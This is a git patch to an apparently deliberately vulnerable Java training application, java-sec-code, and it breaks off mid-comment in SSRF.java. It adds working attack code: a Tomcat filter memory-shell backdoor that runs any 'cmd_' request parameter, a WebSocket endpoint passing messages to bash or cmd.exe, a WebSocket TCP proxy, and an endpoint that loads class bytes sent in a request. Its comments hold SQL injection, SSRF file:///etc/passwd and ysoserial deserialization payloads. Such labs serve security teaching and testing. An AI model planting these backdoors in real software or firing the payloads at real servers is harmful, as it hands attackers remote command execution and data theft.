From c3c41b44e0361b565bc945b106aeabc1676d30bd Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 23 Feb 2023 23:01:00 +0800
Subject: [PATCH 12/20] fix #25

---
 java-sec-code.iml                             |   2 +-
 pom.xml                                       |   6 +
 .../joychou/config/TomcatFilterMemShell.java  | 120 ++++++++++++++++
 .../joychou/config/WebSocketsCmdEndpoint.java |  46 +++++++
 .../config/WebSocketsProxyEndpoint.java       | 111 +++++++++++++++
 .../joychou/controller/ClassDataLoader.java   |  31 +++++
 .../org/joychou/controller/Deserialize.java   |  16 +--
 .../java/org/joychou/controller/Dotall.java   |   1 -
 .../java/org/joychou/controller/SQLI.java     |  73 +++++-----
 .../java/org/joychou/controller/SSRF.java     |  78 ++++++-----
 .../org/joychou/controller/WebSockets.java    |  76 +++++++++++
 src/main/java/org/joychou/controller/XXE.java |   3 +-
 .../joychou/security/WebSecurityConfig.java   |   7 +-
 .../joychou/security/ssrf/SSRFChecker.java    | 129 ++++++++++++++++--
 src/main/resources/application.properties     |  23 +++-
 15 files changed, 618 insertions(+), 104 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/TomcatFilterMemShell.java
 create mode 100644 src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java
 create mode 100644 src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java
 create mode 100644 src/main/java/org/joychou/controller/ClassDataLoader.java
 create mode 100644 src/main/java/org/joychou/controller/WebSockets.java

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 9b423c61..6e093293 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -57,7 +57,6 @@
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf-spring4:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: ognl:ognl:3.0.8" level="project" />
-    <orderEntry type="library" name="Maven: org.javassist:javassist:3.21.0-GA" level="project" />
     <orderEntry type="library" name="Maven: org.unbescape:unbescape:1.1.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect:1.4.0" level="project" />
     <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
@@ -222,5 +221,6 @@
     <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
     <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
+    <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 751a4b35..43c5b99a 100644
--- a/pom.xml
+++ b/pom.xml
@@ -306,6 +306,12 @@
             <version>5.8.10</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/config/TomcatFilterMemShell.java b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
new file mode 100644
index 00000000..be7a1b1c
--- /dev/null
+++ b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
@@ -0,0 +1,120 @@
+package org.joychou.config;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import java.lang.reflect.Field;
+import org.apache.catalina.core.StandardContext;
+import java.io.IOException;
+import org.apache.catalina.loader.WebappClassLoaderBase;
+import org.apache.tomcat.util.descriptor.web.FilterDef;
+import org.apache.tomcat.util.descriptor.web.FilterMap;
+import java.lang.reflect.Constructor;
+import org.apache.catalina.core.ApplicationFilterConfig;
+import org.apache.catalina.Context;
+import org.springframework.stereotype.Component;
+
+import javax.servlet.*;
+import java.util.*;
+
+@Component
+public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
+    static{
+        try {
+            System.out.println("Tomcat filter backdoor class is loading...");
+            final String name = "backdoorTomcatFilter";
+            final String URLPattern = "/*";
+
+            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+            // standardContext为tomcat标准上下文，
+            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
+
+            Class<? extends StandardContext> aClass;
+            try{
+                // standardContext类名为TomcatEmbeddedContex，TomcatEmbeddedContext父类为StandardContext
+                // 适用于内嵌式springboot的tomcat
+                aClass = (Class<? extends StandardContext>) standardContext.getClass().getSuperclass();
+            }catch (Exception e){
+                aClass = standardContext.getClass();
+            }
+            Field Configs = aClass.getDeclaredField("filterConfigs");
+            Configs.setAccessible(true);
+            // 获取当前tomcat标准上下文中已经存在的filterConfigs
+            Map filterConfigs = (Map) Configs.get(standardContext);
+
+            // 判断下防止重复注入
+            if (filterConfigs.get(name) == null) {
+                // 构造filterDef，并将filterDef添加到standardContext的FilterDef中
+                TomcatFilterMemShell backdoorFilter = new TomcatFilterMemShell();
+                FilterDef filterDef = new FilterDef();
+                filterDef.setFilter(backdoorFilter);
+                filterDef.setFilterName(name);
+                filterDef.setFilterClass(backdoorFilter.getClass().getName());
+                standardContext.addFilterDef(filterDef);
+
+                // 构造fiterMap，将filterMap添加到standardContext的FilterMap
+                FilterMap filterMap = new FilterMap();
+                filterMap.addURLPattern(URLPattern);
+                filterMap.setFilterName(name);
+                filterMap.setDispatcher(DispatcherType.REQUEST.name());
+                standardContext.addFilterMapBefore(filterMap);
+
+                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
+                constructor.setAccessible(true);
+                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
+
+                // 最终将构造好的filterConfig存入StandardContext类的filterConfigs成员变量即可
+                filterConfigs.put(name, filterConfig);
+                System.out.println("Tomcat filter backdoor inject success!");
+            } else System.out.println("It has been successfully injected, do not inject again.");
+        } catch (Exception e) {
+            System.out.println(e.getMessage());
+        }
+    }
+
+
+    @Override
+    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+    }
+
+    @Override
+    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+    }
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    @Override
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        String cmd;
+        if ((cmd = servletRequest.getParameter("cmd_")) != null) {
+            Process process = Runtime.getRuntime().exec(cmd);
+            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
+                    new java.io.InputStreamReader(process.getInputStream()));
+            StringBuilder stringBuilder = new StringBuilder();
+            String line;
+            while ((line = bufferedReader.readLine()) != null) {
+                stringBuilder.append(line).append('\n');
+            }
+            servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
+            servletResponse.getOutputStream().flush();
+            servletResponse.getOutputStream().close();
+            return;
+        }
+
+        filterChain.doFilter(servletRequest, servletResponse);
+    }
+
+
+    @Override
+    public void destroy() {
+
+    }
+
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java b/src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java
new file mode 100644
index 00000000..ae4a0f1a
--- /dev/null
+++ b/src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java
@@ -0,0 +1,46 @@
+package org.joychou.config;
+
+import javax.websocket.*;
+import java.io.InputStream;
+
+public class WebSocketsCmdEndpoint extends Endpoint implements MessageHandler.Whole<String> {
+    private Session session;
+
+    @Override
+    public void onOpen(Session session, EndpointConfig endpointConfig) {
+        this.session = session;
+        session.addMessageHandler(this);
+    }
+
+    @Override
+    public void onClose(Session session, CloseReason closeReason) {
+        super.onClose(session, closeReason);
+    }
+
+    @Override
+    public void onError(Session session, Throwable throwable) {
+        super.onError(session, throwable);
+    }
+
+    @Override
+    public void onMessage(String s) {
+        try {
+            Process process;
+            boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
+            if (bool) {
+                process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", s});
+            } else {
+                process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", s});
+            }
+            InputStream inputStream = process.getInputStream();
+            StringBuilder stringBuilder = new StringBuilder();
+            int i;
+            while ((i = inputStream.read()) != -1) stringBuilder.append((char) i);
+            inputStream.close();
+            process.waitFor();
+            session.getBasicRemote().sendText(stringBuilder.toString());
+        } catch (Exception exception) {
+            exception.printStackTrace();
+        }
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java b/src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java
new file mode 100644
index 00000000..4c1f7710
--- /dev/null
+++ b/src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java
@@ -0,0 +1,111 @@
+package org.joychou.config;
+
+import javax.websocket.Endpoint;
+import javax.websocket.EndpointConfig;
+import javax.websocket.MessageHandler;
+import javax.websocket.Session;
+import java.io.ByteArrayOutputStream;
+import java.net.InetSocketAddress;
+import java.nio.ByteBuffer;
+import java.nio.channels.AsynchronousSocketChannel;
+import java.nio.channels.CompletionHandler;
+import java.util.HashMap;
+import java.util.concurrent.Future;
+import java.util.concurrent.TimeUnit;
+
+public class WebSocketsProxyEndpoint extends Endpoint {
+    long i = 0;
+    ByteArrayOutputStream baos = new ByteArrayOutputStream();
+    HashMap<String, AsynchronousSocketChannel> map = new HashMap<String, AsynchronousSocketChannel>();
+
+    static class Attach {
+        public AsynchronousSocketChannel client;
+        public Session channel;
+    }
+
+    void readFromServer(Session channel, AsynchronousSocketChannel client) {
+        final ByteBuffer buffer = ByteBuffer.allocate(50000);
+        Attach attach = new Attach();
+        attach.client = client;
+        attach.channel = channel;
+        client.read(buffer, attach, new CompletionHandler<Integer, Attach>() {
+            @Override
+            public void completed(Integer result, final Attach scAttachment) {
+                buffer.clear();
+                try {
+                    if (buffer.hasRemaining() && result >= 0) {
+                        byte[] arr = new byte[result];
+                        ByteBuffer b = buffer.get(arr, 0, result);
+                        baos.write(arr, 0, result);
+                        ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
+                        if (scAttachment.channel.isOpen()) {
+                            scAttachment.channel.getBasicRemote().sendBinary(q);
+                        }
+                        baos = new ByteArrayOutputStream();
+                        readFromServer(scAttachment.channel, scAttachment.client);
+                    } else {
+                        if (result > 0) {
+                            byte[] arr = new byte[result];
+                            ByteBuffer b = buffer.get(arr, 0, result);
+                            baos.write(arr, 0, result);
+                            readFromServer(scAttachment.channel, scAttachment.client);
+                        }
+                    }
+                } catch (Exception ignored) {
+                }
+            }
+
+            @Override
+            public void failed(Throwable t, Attach scAttachment) {
+                t.printStackTrace();
+            }
+        });
+    }
+
+    void process(ByteBuffer z, Session channel) {
+        try {
+            if (i > 1) {
+                AsynchronousSocketChannel client = map.get(channel.getId());
+                client.write(z).get();
+                z.flip();
+                z.clear();
+            } else if (i == 1) {
+                String values = new String(z.array());
+                String[] array = values.split(" ");
+                String[] addrarray = array[1].split(":");
+                AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
+                int po = Integer.parseInt(addrarray[1]);
+                InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
+                Future<Void> future = client.connect(hostAddress);
+                try {
+                    future.get(10, TimeUnit.SECONDS);
+                } catch (Exception ignored) {
+                    channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
+                    return;
+                }
+                map.put(channel.getId(), client);
+                readFromServer(channel, client);
+                channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
+            }
+        } catch (Exception ignored) {
+        }
+    }
+
+    @Override
+    public void onOpen(final Session session, EndpointConfig config) {
+        i = 0;
+        session.setMaxBinaryMessageBufferSize(1024 * 1024 * 20);
+        session.setMaxTextMessageBufferSize(1024 * 1024 * 20);
+        session.addMessageHandler(new MessageHandler.Whole<ByteBuffer>() {
+            @Override
+            public void onMessage(ByteBuffer message) {
+                try {
+                    message.clear();
+                    i++;
+                    process(message, session);
+                } catch (Exception ignored) {
+                }
+            }
+        });
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/ClassDataLoader.java b/src/main/java/org/joychou/controller/ClassDataLoader.java
new file mode 100644
index 00000000..acd4ff3f
--- /dev/null
+++ b/src/main/java/org/joychou/controller/ClassDataLoader.java
@@ -0,0 +1,31 @@
+package org.joychou.controller;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+
+public class ClassDataLoader {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    @RequestMapping("/classloader")
+    public void classData() {
+        try{
+            ServletRequestAttributes sra = (ServletRequestAttributes) RequestContextHolder.getRequestAttributes();
+            HttpServletRequest request = sra.getRequest();
+            String classData = request.getParameter("classData");
+
+            byte[] classBytes = java.util.Base64.getDecoder().decode(classData);
+            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
+            defineClassMethod.setAccessible(true);
+            Class cc = (Class) defineClassMethod.invoke(ClassLoader.getSystemClassLoader(), null, classBytes, 0, classBytes.length);
+            cc.newInstance();
+        }catch(Exception e){
+            logger.error(e.toString());
+        }
+    }
+}
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 9531e980..1ca5ff43 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -29,17 +29,14 @@ public class Deserialize {
     protected final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     /**
-     * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
-     * Add the result to rememberMe cookie.
-     * <p>
-     * http://localhost:8080/deserialize/rememberMe/vuln
+     * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64 <br>
+     * <a href="http://localhost:8080/deserialize/rememberMe/vuln">http://localhost:8080/deserialize/rememberMe/vuln</a>
      */
     @RequestMapping("/rememberMe/vuln")
     public String rememberMeVul(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
         Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
-
         if (null == cookie) {
             return "No rememberMe cookie. Right?";
         }
@@ -56,12 +53,9 @@ public String rememberMeVul(HttpServletRequest request)
     }
 
     /**
-     * Check deserialize class using black list.
-     * Or
-     * Update commons-collections to 3.2.2 or above.
-     * Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.
-     * <p>
-     * http://localhost:8080/deserialize/rememberMe/security
+     * Check deserialize class using black list. <br>
+     * Or update commons-collections to 3.2.2 or above.Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.<br>
+     * <a href="http://localhost:8080/deserialize/rememberMe/security">http://localhost:8080/deserialize/rememberMe/security</a>
      */
     @RequestMapping("/rememberMe/security")
     public String rememberMeBlackClassCheck(HttpServletRequest request)
diff --git a/src/main/java/org/joychou/controller/Dotall.java b/src/main/java/org/joychou/controller/Dotall.java
index d2dfc49d..f6746354 100644
--- a/src/main/java/org/joychou/controller/Dotall.java
+++ b/src/main/java/org/joychou/controller/Dotall.java
@@ -18,7 +18,6 @@ public class Dotall {
 
     /**
      * <a href="https://github.com/spring-projects/spring-security/compare/5.5.6..5.5.7">官方spring-security修复commit记录</a>
-     * 漏洞描述：h
      */
     public static void main(String[] args) throws Exception{
         Pattern vuln_pattern = Pattern.compile("/black_path.*");
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 6682115c..be46f45b 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -6,10 +6,10 @@
 import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.*;
 
+import javax.annotation.Resource;
 import java.sql.*;
 import java.util.List;
 
@@ -25,8 +25,10 @@
 @RequestMapping("/sqli")
 public class SQLI {
 
-    private static Logger logger = LoggerFactory.getLogger(SQLI.class);
-    private static String driver = "com.mysql.jdbc.Driver";
+    private static final Logger logger = LoggerFactory.getLogger(SQLI.class);
+
+    // com.mysql.jdbc.Driver is deprecated. Change to com.mysql.cj.jdbc.Driver.
+    private static final String driver = "com.mysql.cj.jdbc.Driver";
 
     @Value("${spring.datasource.url}")
     private String url;
@@ -37,15 +39,14 @@ public class SQLI {
     @Value("${spring.datasource.password}")
     private String password;
 
-    @Autowired
+    @Resource
     private UserMapper userMapper;
 
 
     /**
-     * Vuln Code.
-     * http://localhost:8080/sqli/jdbc/vuln?username=joychou
+     * <p>Sql injection jbdc vuln code.</p><br>
      *
-     * @param username username
+     * <a href="http://localhost:8080/sqli/jdbc/vuln?username=joychou">http://localhost:8080/sqli/jdbc/vuln?username=joychou</a>
      */
     @RequestMapping("/jdbc/vuln")
     public String jdbc_sqli_vul(@RequestParam("username") String username) {
@@ -77,7 +78,7 @@ public String jdbc_sqli_vul(@RequestParam("username") String username) {
 
 
         } catch (ClassNotFoundException e) {
-            logger.error("Sorry,can`t find the Driver!");
+            logger.error("Sorry, can't find the Driver!");
         } catch (SQLException e) {
             logger.error(e.toString());
         }
@@ -86,10 +87,9 @@ public String jdbc_sqli_vul(@RequestParam("username") String username) {
 
 
     /**
-     * Security Code.
-     * http://localhost:8080/sqli/jdbc/sec?username=joychou
+     * <p>Sql injection jbdc security code by using {@link PreparedStatement}.</p><br>
      *
-     * @param username username
+     * <a href="http://localhost:8080/sqli/jdbc/sec?username=joychou">http://localhost:8080/sqli/jdbc/sec?username=joychou</a>
      */
     @RequestMapping("/jdbc/sec")
     public String jdbc_sqli_sec(@RequestParam("username") String username) {
@@ -100,7 +100,7 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
             Connection con = DriverManager.getConnection(url, user, password);
 
             if (!con.isClosed())
-                System.out.println("Connecting to Database successfully.");
+                System.out.println("Connect to database successfully.");
 
             // fix code
             String sql = "select * from users where username = ?";
@@ -122,7 +122,7 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
             con.close();
 
         } catch (ClassNotFoundException e) {
-            logger.error("Sorry, can`t find the Driver!");
+            logger.error("Sorry, can't find the Driver!");
             e.printStackTrace();
         } catch (SQLException e) {
             logger.error(e.toString());
@@ -132,9 +132,8 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
 
 
     /**
-     * http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a
-     *
-     * Incorrect use of prepareStatement. prepareStatement must use ? as a placeholder.
+     * <p>Incorrect use of prepareStatement. PrepareStatement must use ? as a placeholder.</p>
+     * <a href="http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a">http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a</a>
      */
     @RequestMapping("/jdbc/ps/vuln")
     public String jdbc_ps_vuln(@RequestParam("username") String username) {
@@ -165,7 +164,7 @@ public String jdbc_ps_vuln(@RequestParam("username") String username) {
             con.close();
 
         } catch (ClassNotFoundException e) {
-            logger.error("Sorry, can`t find the Driver!");
+            logger.error("Sorry, can't find the Driver!");
             e.printStackTrace();
         } catch (SQLException e) {
             logger.error(e.toString());
@@ -175,10 +174,9 @@ public String jdbc_ps_vuln(@RequestParam("username") String username) {
 
 
     /**
-     * vuln code
-     * http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1
-     *
-     * @param username username
+     * <p>Sql injection of mybatis vuln code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1">http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1</a>
+     * <p>select * from users where username = 'joychou' or '1'='1' </p>
      */
     @GetMapping("/mybatis/vuln01")
     public List<User> mybatisVuln01(@RequestParam("username") String username) {
@@ -186,17 +184,20 @@ public List<User> mybatisVuln01(@RequestParam("username") String username) {
     }
 
     /**
-     * vul code
-     * http://localhost:8080/sqli/mybatis/vuln02?username=joychou' or '1'='1' %23
-     *
-     * @param username username
+     * <p>Sql injection of mybatis vuln code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/vuln02?username=joychou' or '1'='1">http://localhost:8080/sqli/mybatis/vuln02?username=joychou' or '1'='1</a>
+     * <p>select * from users where username like '%joychou' or '1'='1%' </p>
      */
     @GetMapping("/mybatis/vuln02")
     public List<User> mybatisVuln02(@RequestParam("username") String username) {
         return userMapper.findByUserNameVuln02(username);
     }
 
-    // http://localhost:8080/sqli/mybatis/orderby/vuln03?sort=1 desc%23
+    /**
+     * <p>Sql injection of mybatis vuln code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/orderby/vuln03?sort=id desc--">http://localhost:8080/sqli/mybatis/orderby/vuln03?sort=id desc--</a>
+     * <p> select * from users order by id desc-- asc</p>
+     */
     @GetMapping("/mybatis/orderby/vuln03")
     public List<User> mybatisVuln03(@RequestParam("sort") String sort) {
         return userMapper.findByUserNameVuln03(sort);
@@ -204,10 +205,8 @@ public List<User> mybatisVuln03(@RequestParam("sort") String sort) {
 
 
     /**
-     * security code
-     * http://localhost:8080/sqli/mybatis/sec01?username=joychou
-     *
-     * @param username username
+     * <p>Sql injection mybatis security code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/sec01?username=joychou">http://localhost:8080/sqli/mybatis/sec01?username=joychou</a>
      */
     @GetMapping("/mybatis/sec01")
     public User mybatisSec01(@RequestParam("username") String username) {
@@ -215,9 +214,8 @@ public User mybatisSec01(@RequestParam("username") String username) {
     }
 
     /**
-     * http://localhost:8080/sqli/mybatis/sec02?id=1
-     *
-     * @param id id
+     * <p>Sql injection mybatis security code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/sec02?id=1">http://localhost:8080/sqli/mybatis/sec02?id=1</a>
      */
     @GetMapping("/mybatis/sec02")
     public User mybatisSec02(@RequestParam("id") Integer id) {
@@ -226,14 +224,19 @@ public User mybatisSec02(@RequestParam("id") Integer id) {
 
 
     /**
-     * http://localhost:8080/sqli/mybatis/sec03
+     * <p>Sql injection mybatis security code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/sec03">http://localhost:8080/sqli/mybatis/sec03</a>
      */
     @GetMapping("/mybatis/sec03")
     public User mybatisSec03() {
         return userMapper.OrderByUsername();
     }
 
-
+    /**
+     * <p>Order by sql injection mybatis security code by using sql filter.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/orderby/sec04?sort=id">http://localhost:8080/sqli/mybatis/orderby/sec04?sort=id</a>
+     * <p>select * from users order by id asc </p>
+     */
     @GetMapping("/mybatis/orderby/sec04")
     public List<User> mybatisOrderBySec04(@RequestParam("sort") String sort) {
         return userMapper.findByUserNameVuln03(SecurityUtil.sqlFilter(sort));
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index b4c4bde8..f28b8b91 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -34,11 +34,12 @@ public class SSRF {
     private HttpService httpService;
 
     /**
-     * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
-     *
-     * The default setting of followRedirects is true.
-     * Protocol: file ftp mailto http https jar netdoc
-     * UserAgent is Java/1.8.0_102.
+     * <p>
+     *    The default setting of followRedirects is true. <br>
+     *    Protocol: file ftp mailto http https jar netdoc. <br>
+     *    UserAgent is Java/1.8.0_102.
+     * </p>
+     * <a href="http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd">http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd</a>
      */
     @RequestMapping(value = "/urlConnection/vuln", method = {RequestMethod.POST, RequestMethod.GET})
     public String URLConnectionVuln(String url) {
@@ -90,9 +91,8 @@ public String httpURLConnectionVuln(@RequestParam String url) {
 
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
-     *
-     * http://localhost:8080/ssrf/request/sec?url=http://test.joychou.org
+     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>. <br>
+     * <a href="http://localhost:8080/ssrf/request/sec?url=http://test.joychou.org">http://localhost:8080/ssrf/request/sec?url=http://test.joychou.org</a>
      */
     @GetMapping("/request/sec")
     public String request(@RequestParam String url) {
@@ -108,12 +108,12 @@ public String request(@RequestParam String url) {
 
 
     /**
-     * Download the url file.
-     * http://localhost:8080/ssrf/openStream?url=file:///etc/passwd
-     * <p>
-     * new URL(String url).openConnection()
-     * new URL(String url).openStream()
-     * new URL(String url).getContent()
+     * Download the url file. <br>
+     * <code>new URL(String url).openConnection()</code>  <br>
+     * <code>new URL(String url).openStream()</code> <br>
+     * <code>new URL(String url).getContent()</code> <br>
+     * <a href="http://localhost:8080/ssrf/openStream?url=file:///etc/passwd">http://localhost:8080/ssrf/openStream?url=file:///etc/passwd</a>
+
      */
     @GetMapping("/openStream")
     public void openStream(@RequestParam String url, HttpServletResponse response) throws IOException {
@@ -179,12 +179,10 @@ public String okhttp(@RequestParam String url) {
 
     }
 
-
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
-     *
-     * http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com
+     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>. <br>
+     * <a href="http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com">http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com</a>
      */
     @GetMapping("/httpclient/sec")
     public String HttpClient(@RequestParam String url) {
@@ -204,8 +202,7 @@ public String HttpClient(@RequestParam String url) {
     /**
      * The default setting of followRedirects is true.
      * UserAgent is <code>Jakarta Commons-HttpClient/3.1</code>.
-     *
-     * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
+     * <a href="http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com">http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com</a>
      */
     @GetMapping("/commonsHttpClient/sec")
     public String commonsHttpClient(@RequestParam String url) {
@@ -223,9 +220,8 @@ public String commonsHttpClient(@RequestParam String url) {
 
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is the useragent of browser.
-     *
-     * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
+     * UserAgent is the useragent of browser.<br>
+     * <a href="http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com">http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com</a>
      */
     @GetMapping("/Jsoup/sec")
     public String Jsoup(@RequestParam String url) {
@@ -244,9 +240,8 @@ public String Jsoup(@RequestParam String url) {
 
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is <code>Java/1.8.0_102</code>.
-     *
-     * http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com
+     * UserAgent is <code>Java/1.8.0_102</code>. <br>
+     * <a href="http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com">http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com</a>
      */
     @GetMapping("/IOUtils/sec")
     public String IOUtils(String url) {
@@ -274,10 +269,10 @@ public String HttpSyncClients(@RequestParam("url") String url) {
 
 
     /**
-     * http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com <p>
-     * Only support HTTP protocol. <p>
-     * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects<p>
-     * User-Agent: Java/1.8.0_102 <p>
+     * Only support HTTP protocol. <br>
+     * GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects. <br>
+     * User-Agent is Java/1.8.0_102. <br>
+     * <a href="http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com">http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com</a>
      */
     @GetMapping("/restTemplate/vuln1")
     public String RestTemplateUrlBanRedirects(String url){
@@ -296,12 +291,9 @@ public String RestTemplateUrl(String url){
 
 
     /**
-     * http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com <p>
-     * UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool<p>
-     * Redirects: Do not follow redirects <p>
-     *
-     * @param url url
-     * @return contents of url
+     * UserAgent is Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool.
+     * Do not follow redirects. <br>
